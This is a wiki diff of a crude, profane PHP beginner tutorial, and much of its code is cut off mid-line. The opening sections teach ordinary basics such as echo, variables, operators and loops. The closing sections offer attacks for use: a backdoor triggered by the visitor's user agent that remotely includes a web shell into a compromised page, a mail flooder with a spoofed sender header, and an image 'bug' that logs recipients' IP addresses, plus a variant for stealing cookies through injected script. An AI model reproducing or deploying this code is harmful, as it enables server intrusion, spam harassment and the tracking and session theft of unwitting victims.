tools:php
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
tools:php [2024/06/03 03:16] – Humphrey Boa-Gart | tools:php [2024/08/06 05:48] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | {{wst> | + | {{wst> |
====== PHP ====== | ====== PHP ====== | ||
Line 5: | Line 5: | ||
PHP is a server side language, meaning you can't see the source code in your browser, because all of the stuff is done on the server. To start, get some web hosting (easy) or start your own server (not as easy), and create a .php file. Having a decent knowledge of [[tools: | PHP is a server side language, meaning you can't see the source code in your browser, because all of the stuff is done on the server. To start, get some web hosting (easy) or start your own server (not as easy), and create a .php file. Having a decent knowledge of [[tools: | ||
- | {{tag> | + | ===== HELLO WORLD ===== |
+ | |||
+ | Yeah... This is the ancient tradition of beginners starting out in any language. Here you go. | ||
+ | |||
+ | <?php | ||
+ | echo "LOL HAI THER AMIDOINITRITE?"; | ||
+ | print(" | ||
+ | ?> | ||
+ | |||
+ | Let's go over some rulez. (The word rules does not have a ' | ||
+ | |||
+ | All PHP code starts with <?php and ends with ?>. These are called delimiters. echo is a statement that basically prints out whatever is in the double quotes. It isn't a function. (printf() is though.) Since echo is a statement, much like require/ | ||
+ | ==== Hello World, Again (with HTML) ==== | ||
+ | |||
+ | We saw how echo can output text. But it can also output HTML code and JavaScript. Example here. | ||
+ | |||
+ | <?php | ||
+ | echo "< | ||
+ | ?> | ||
+ | |||
+ | This' | ||
+ | ===== Variables ===== | ||
+ | |||
+ | Now we'll learn a little about variables. PHP is great because, unlike other languages, you don't need to specify what type of variable you are declaring (integer, Boolean, float, string, etc). PHP automatically identifies the type for you. Anyway, here we go. | ||
+ | |||
+ | <?php | ||
+ | $lolvar = 6; | ||
+ | $loldecimal = 3.12; | ||
+ | $lolstring = "This is a string."; | ||
+ | echo $lolvar; | ||
+ | echo $loldecimal; | ||
+ | echo $lolstring; | ||
+ | ?> | ||
+ | |||
+ | Some things to note: | ||
+ | |||
+ | ALL VARIABLES START WITH THE DOLLAR SIGN ($) NO EXCEPTIONS When echoing a variable you don't need the double quotes You can also concatenate, | ||
+ | |||
+ | <?php | ||
+ | $lol = " | ||
+ | $wut = " | ||
+ | $randomdigit = 2; | ||
+ | echo "Did you just use the meme " . $lol . " " . $wut . " " .$randomdigit . " times?"; | ||
+ | ?> | ||
+ | |||
+ | This' | ||
+ | ==== Constants ==== | ||
+ | |||
+ | Constants are like variables, except they do not begin with a dollar sign and cannot be changed or deleted once defined. It is usual practice to name constants in all capitals (much like macros in C/C++). You define constants with the define(); function: | ||
+ | |||
+ | <?php | ||
+ | define(" | ||
+ | echo MYCONSTANT; | ||
+ | ?> | ||
+ | |||
+ | This sends out " | ||
+ | ===== Predefined variables ===== | ||
+ | |||
+ | Always $_, ex: $_COOKIE, $_SERVER, $_GET, $_REQUEST, and $_POST Some can only be used before any output is sent | ||
+ | |||
+ | <?php | ||
+ | $ip = $_SERVER[' | ||
+ | $ref = $_SERVER[' | ||
+ | echo $ip." Was referred by " | ||
+ | $UserAgent = $_SERVER[HTTP_USER_AGENT]; | ||
+ | $Software = $_SERVER[' | ||
+ | echo "Their useragent was " | ||
+ | echo "Your server software is " | ||
+ | ?> | ||
+ | |||
+ | Will output something like: | ||
+ | |||
+ | 0.0.0.0 Was referred by ----- Their useragent was Mozilla/5.0 Your server software is Apache/ | ||
+ | |||
+ | (Depending on your server environment.) | ||
+ | ==== Types of variables ==== | ||
+ | |||
+ | The datatype a variable uses is usually implicit, meaning PHP will determine what type of variable it should use based on its contents. However, these are some of the datatypes at your disposal. | ||
+ | |||
+ | Boolean ex: $a = true; #has only 2 possible values, true or false | ||
+ | Integer ex: $b = 4; #holds whole numbers | ||
+ | String ex: $c = " | ||
+ | Float ex: $d = 3.5252524; #holds numbers with decimals | ||
+ | Array ex: $e = array(5, 3, 1); #holds a list of any other type of data, be it an integer, string, boolean, etc. | ||
+ | Null ex: $f = NULL; #only holds null (nothing) | ||
+ | ===== Operators ===== | ||
+ | |||
+ | ==== Arithmetic ==== | ||
+ | |||
+ | + Addition | ||
+ | - Subtraction | ||
+ | * Multiplication | ||
+ | / Division | ||
+ | % Division with remainder | ||
+ | ==== Assignment ==== | ||
+ | |||
+ | += ex: n+=7, or N equals N+7 | ||
+ | -= | ||
+ | *= | ||
+ | /= | ||
+ | %= | ||
+ | .= | ||
+ | = | ||
+ | ==== Logical ==== | ||
+ | |||
+ | && , AND ex: if (($a>0) && ($a< | ||
+ | || , OR ex: if (($a==0)||($a==1)){ | ||
+ | ! , NOT ex: if ($a != 2) { | ||
+ | ==== Comparison ==== | ||
+ | |||
+ | < Less than | ||
+ | > Greater than | ||
+ | == Equal to | ||
+ | != Not equal | ||
+ | === Identical | ||
+ | !== Not identical | ||
+ | <= Less than or equal to | ||
+ | >= Greater than or equal to | ||
+ | ==== Conditional statements and loops ==== | ||
+ | |||
+ | Now you have a basic understanding of printing things, now it's time to start something else. We will explore loops and conditional statements. Loops will pretty much do something a certain amount of times and conditional statements control what the program does if a condition is fulfilled or not. | ||
+ | ==== Conditional statements ==== | ||
+ | |||
+ | Well, it's basically just if and switch, but the former is pretty useful. You have to know this one. | ||
+ | ==== If ==== | ||
+ | |||
+ | This essentially checks whether or not a condition is true. | ||
+ | |||
+ | <?php | ||
+ | $willdo = true; | ||
+ | if($willdo == true){ | ||
+ | echo " | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | An else statement is an addition to an if statement which allows for another condition. If there' | ||
+ | |||
+ | <?php | ||
+ | $wontdo = false; | ||
+ | if($wontdo == true){ | ||
+ | echo " | ||
+ | } else { | ||
+ | echo " | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | Else if statements allow for multiple conditions, if and only if the first condition before it was false. | ||
+ | |||
+ | <?php | ||
+ | $maydo = 99; | ||
+ | $maynotdo = false; | ||
+ | if($maynotdo == true){ | ||
+ | echo " | ||
+ | } elseif ($maydo == 99){ | ||
+ | echo "did anyway"; | ||
+ | } else { | ||
+ | echo " | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | Also: | ||
+ | |||
+ | - Conditions in parentheses just have to be true. You don't have to use an == or != if it's a boolean value (true/ | ||
+ | - There are logical operators like and (&& | ||
+ | - a ! behind it means it's false, so if $dick is true, !$dick is false, and vice versa if $dick was false. | ||
+ | ==== Switch ==== | ||
+ | |||
+ | A substitute to a whole bunch of elseifs. It tests if a given value is equal to something. Cases can be any value. There' | ||
+ | |||
+ | <?php | ||
+ | switch ($value) { | ||
+ | case false: | ||
+ | echo "value is 0"; | ||
+ | | ||
+ | case 17: | ||
+ | echo "value is 1"; | ||
+ | | ||
+ | case " | ||
+ | echo "value is pigdog"; | ||
+ | | ||
+ | case NULL: | ||
+ | echo "value is null"; | ||
+ | | ||
+ | default: | ||
+ | echo "value is something else other than 0, 1, pigdog, or null."; | ||
+ | | ||
+ | } | ||
+ | ?> | ||
+ | ===== Loops ===== | ||
+ | |||
+ | There are three main loops: for loops, foreach loops, and while/ | ||
+ | ==== For loops ==== | ||
+ | |||
+ | For this loop you simply declare a variable as a counter, and the loop will occur as many times as you want it until the counter reaches a certain number. | ||
+ | |||
+ | <?php | ||
+ | $counter = 0; | ||
+ | for($counter = 0; $counter < 6; $counter++) | ||
+ | { | ||
+ | echo "HAI | ||
+ | "; | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | What this code does is take the variable we made, and use it as a counter. As long as the variable, $counter, is less than 6, the ++ operator will add one to the value of $counter and then the code within the curly braces {} will be executed. So the output of this code is: | ||
+ | |||
+ | HAI | ||
+ | |||
+ | HAI | ||
+ | |||
+ | HAI | ||
+ | |||
+ | HAI | ||
+ | |||
+ | HAI | ||
+ | |||
+ | Some notes about this code: | ||
+ | |||
+ | 1. The ++ operator adds one to a variable, and can be used on any variable. This is an example of a unary operator. You could also use -- to subtract one from the variable. 2. Notice that the for loop did NOT end in a semicolon. This is intended. Loops and conditionals don't need a semicolon. But the code inside of the curly braces DOES need the semicolons. | ||
+ | ==== Foreach loops ==== | ||
+ | |||
+ | This statement essentially sets the number of times something' | ||
+ | |||
+ | <?php | ||
+ | $lolarray = array(" | ||
+ | foreach($lolarray as $value){ | ||
+ | echo $value . "</ | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | This code will output: | ||
+ | |||
+ | lol | ||
+ | |||
+ | rofl | ||
+ | |||
+ | lmao | ||
+ | |||
+ | Also: | ||
+ | |||
+ | 1. you might want to unset(), or destroy the variable you use. You never know. 2. foreach($array as $key => $value) will assign $key as a key, but it's basically the same. | ||
+ | ==== While loops ==== | ||
+ | |||
+ | This is probably the simplest loop there is. As long as a condition is true, this loop will run. If the condition is false or if break is used it'll stop the loop. Be careful not to create an infinite loop or your internets will explode; also, if the conditions aren't met or defined the code inside won't run. | ||
+ | |||
+ | Like this. | ||
+ | |||
+ | <?php | ||
+ | $fuckme = false; | ||
+ | while($fuckme){ /* or while($fuckme == true) */ | ||
+ | echo "This loop won't run.\n"; | ||
+ | } | ||
+ | |||
+ | But this will run. | ||
+ | |||
+ | $fucku = 17; | ||
+ | while($fucku == 17){ | ||
+ | echo "This loop will run. Infinitely.\n"; | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | This one will run too, but it'll stop after a while. (you would use a for loop in this position though) | ||
+ | |||
+ | <?php | ||
+ | $lolwut = 0 | ||
+ | while($lolwut <= 5){ | ||
+ | | ||
+ | echo "This will run for ". $lolkay ." more times after this..\n"; | ||
+ | | ||
+ | } | ||
+ | echo " | ||
+ | ?> | ||
+ | |||
+ | This will produce: | ||
+ | |||
+ | This will run for 5 more times. | ||
+ | |||
+ | This will run for 4 more times. | ||
+ | |||
+ | This will run for 3 more times. | ||
+ | |||
+ | This will run for 2 more times. | ||
+ | |||
+ | This will run for 1 more times. | ||
+ | |||
+ | This will run for 0 more times. | ||
+ | |||
+ | Done. | ||
+ | |||
+ | This isn't as useful as you imagine though. | ||
+ | ==== Do-while loops ==== | ||
+ | |||
+ | This does the same thing as a while loop but it checks the condition after the action' | ||
+ | |||
+ | <?php | ||
+ | $doit = false; | ||
+ | do { | ||
+ | echo "Did it anyway, lol"; | ||
+ | } while ($doit); | ||
+ | ?> | ||
+ | |||
+ | This is useful if you want the code run at least once but not necessarily further times. | ||
+ | ==== Simple Backdoor in PHP ==== | ||
+ | |||
+ | Because many of you want to go straight to the uber hax, I'll add this little bit in. Please stop reading and Google up the following if you don't know this already: | ||
+ | |||
+ | 1. Basic Understanding of PHP 2. Remote File Inclusion 3. Basic web hacking 4. Web shell (c99, x2300 Locus7s, r57, etc.) 5. User Agents and how to change them | ||
+ | |||
+ | Now that you have an idea of what these are, here is how to backdoor a page. If you have access to someone' | ||
+ | |||
+ | <?php | ||
+ | $blackdoor = $_SERVER[' | ||
+ | if($blackdoor == "PUT YOUR USER AGENT HERE) | ||
+ | { | ||
+ | @include(' | ||
+ | } | ||
+ | ?> | ||
+ | ==== Email flooder in PHP ==== | ||
+ | |||
+ | If you want to just copy this and run it off a server, go ahead. Unfortunately most free PHP hosts don't allow you to send mail, but I guess you can run it off your localhost. You must have access to the sendmail binary on your system to run; it's just a matter of configuring php.ini, which I won't go into now. | ||
+ | |||
+ | You need to have: | ||
+ | |||
+ | 1. a server 2. basic knowledge of PHP 3. knowledge on how to install/ | ||
+ | |||
+ | <?php | ||
+ | | ||
+ | // define number of spam cycles | ||
+ | |||
+ | | ||
+ | // this is the message | ||
+ | |||
+ | | ||
+ | // define recipient | ||
+ | |||
+ | $rofl = $_POST[" | ||
+ | // your message | ||
+ | |||
+ | | ||
+ | $sender = $_POST[" | ||
+ | $header = ' | ||
+ | | ||
+ | From: <' . $sender . '>'; | ||
+ | |||
+ | return($header); | ||
+ | } | ||
+ | // spoofed header. i found it easier to write it this way. | ||
+ | |||
+ | | ||
+ | for($i = 1; $i <= $spam; $i++){ | ||
+ | |||
+ | | ||
+ | |||
+ | mail($_POST[" | ||
+ | |||
+ | } // (the second for loop) defines one cycle | ||
+ | |||
+ | echo "Done $i loops of $spam | ||
+ | "; // | ||
+ | |||
+ | } | ||
+ | echo " | ||
+ | } | ||
+ | else { | ||
+ | /* if the form isn't filled out show it. also, mess around with this part any way you like. */ | ||
+ | ?> | ||
+ | <form method=" | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | < | ||
+ | |||
+ | </ | ||
+ | <?php | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | ===== Image Bugs ===== | ||
+ | |||
+ | Pretty fucking simple, really. You insert the following into an e-mail or something: | ||
+ | |||
+ | c | ||
+ | |||
+ | Then in iplulz.php on your server (or whatever you call it), put this code: | ||
+ | |||
+ | //PROTIP: Make a directory on your server called image.png or any image name, then save the code as index.php in the directory.// | ||
+ | |||
+ | <?PHP | ||
+ | $the_image = " | ||
+ | $ip_lister = fopen(" | ||
+ | fwrite($ip_lister, | ||
+ | fclose($ip_lister); | ||
+ | if (!strncasecmp(substr($the_image, | ||
+ | $image_mime = " | ||
+ | else $image_mime = substr($the_image, | ||
+ | header(" | ||
+ | echo file_get_contents($the_image); | ||
+ | ?> | ||
+ | |||
+ | User gets the image, you get their IP added to a list. EVERYONE WINS | ||
+ | |||
+ | Also, can steel cookies in dat way: | ||
+ | |||
+ | <?PHP | ||
+ | $the_image = " | ||
+ | $ip_lister = fopen(" | ||
+ | fwrite($ip_lister, | ||
+ | fclose($ip_lister); | ||
+ | if (!strncasecmp(substr($the_image, | ||
+ | $image_mime = " | ||
+ | else $image_mime = substr($the_image, | ||
+ | header(" | ||
+ | echo file_get_contents($the_image); | ||
+ | ?> | ||
+ | |||
+ | And in email or whatevastuff put | ||
+ | |||
+ | < | ||
+ | document.write("< | ||
+ | ') | ||
+ | </ | ||
+ | |||
+ | |||
+ | {{tag> |
tools/php.1717384603.txt.gz · Last modified: 2024/08/06 05:52 (external edit)
Find this page online at: https://bestpoint.institute/tools/php
Find this page online at: https://bestpoint.institute/tools/php